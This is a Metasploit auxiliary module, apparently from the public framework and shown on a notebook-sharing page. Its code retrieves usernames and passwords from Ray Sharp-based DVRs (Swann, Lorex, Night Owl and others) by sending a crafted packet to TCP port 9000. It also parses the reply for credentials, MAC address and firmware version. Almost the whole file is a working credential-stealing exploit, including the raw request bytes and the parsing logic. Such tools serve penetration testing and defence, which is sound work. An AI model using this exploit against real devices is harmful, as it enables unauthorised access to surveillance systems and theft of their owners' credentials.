Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize
12
    super(
13
      'Name'        => 'Ray Sharp DVR Password Retriever',
14
      'Description' => %q{
15
          This module takes advantage of a protocol design issue with the
16
        Ray Sharp based DVR systems. It is possible to retrieve the username and
17
        password through the TCP service running on port 9000. Other brands using
18
        this platform and exposing the same issue may include Swann, Lorex,
19
        Night Owl, Zmodo, URMET, and KGuard Security.
20
      },
21
      'Author'      =>
22
        [
23
          'someluser', # Python script
24
          'hdm'        # Metasploit module
25
        ],
26
      'References'  =>
27
        [
28
          [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ]
29
        ],
30
      'License'     => MSF_LICENSE
31
    )
32

33
    register_options( [ Opt::RPORT(9000) ])
34
  end
35

36
  def report_cred(opts)
37
    service_data = {
38
      address: opts[:ip],
39
      port: opts[:port],
40
      service_name: opts[:service_name],
41
      protocol: 'tcp',
42
      workspace_id: myworkspace_id
43
    }
44

45
    credential_data = {
46
      origin_type: :service,
47
      module_fullname: fullname,
48
      username: opts[:user],
49
      private_data: opts[:password],
50
      private_type: :password
51
    }.merge(service_data)
52

53
    login_data = {
54
      core: create_credential(credential_data),
55
      status: Metasploit::Model::Login::Status::UNTRIED,
56
      proof: opts[:proof]
57
    }.merge(service_data)
58

59
    create_credential_login(login_data)
60
  end
61

62
  def run_host(ip)
63
    req =
64
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" +
65
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" +
66
      ( "\x00" * 475 )
67

68
    connect
69
    sock.put(req)
70

71
    buf = ""
72
    begin
73
      # Pull data until the socket closes or we time out
74
      Timeout.timeout(15) do
75
        loop do
76
          res = sock.get_once(-1, 1)
77
          buf << res if res
78
        end
79
      end
80
    rescue ::Timeout::Error
81
    rescue ::EOFError
82
    end
83

84
    disconnect
85

86
    info = ""
87
    mac  = nil
88
    ver  = nil
89

90
    creds = {}
91

92
    buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred|
93
      # Make sure the two passwords match
94
      next unless cred[1] == cred[2]
95
      creds[cred[0]] = cred[1]
96
    end
97

98
    if creds.keys.length > 0
99
      creds.keys.sort.each do |user|
100
        pass = creds[user]
101
        report_cred(
102
          ip: rhost,
103
          port: rport,
104
          service_name: 'dvr',
105
          user: user,
106
          password: pass,
107
          proof: pass
108
        )
109
        info << "(user='#{user}' pass='#{pass}') "
110
      end
111
    end
112

113
    # Look for MAC address
114
    if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi
115
      mac = $1
116
    end
117

118
    # Look for version
119
    if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m
120
      ver = $1
121
    end
122

123
    info << "mac=#{mac} " if mac
124
    info << "version=#{ver} " if ver
125

126
    return unless (creds.keys.length > 0 or mac or ver)
127

128
    report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info)
129
    print_good("#{rhost}:#{rport} #{info}")
130
  end
131
end
132

133